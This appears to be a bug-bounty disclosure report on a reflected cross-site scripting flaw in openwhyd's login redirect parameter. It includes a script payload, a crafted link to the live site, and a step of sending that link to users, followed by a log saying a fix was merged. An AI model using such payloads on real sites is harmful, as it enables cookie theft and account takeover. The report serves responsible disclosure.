Cross-site Scripting (XSS) - Reflected in openwhyd/openwhyd

Valid

Reported on

Dec 13th 2021


Description

openwhyd is vulnerable to Reflected XSS vulnerability via the redirect parameter at login page.

Payload

<script>alert(document.cookie)</script>

Vulnerable URL

https://openwhyd.org/login?redirect=<script>alert(document.cookie)</script>

Proof of Concept

Send users the following login link https://openwhyd.org/login?redirect=<script>alert(document.cookie)</script>
After users use their registered account to log in, they will be triggered by the XSS popup.

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the openwhyd team within 24 hours. a month ago
We have contacted a member of the openwhyd team and are waiting to hear back a month ago
We have sent a follow up to the openwhyd team. We will try again in 7 days. a month ago
Adrien Joly validated this vulnerability a month ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
Adrien Joly confirmed that a fix has been merged on 102a97 22 days ago
Adrien Joly has been awarded the fix bounty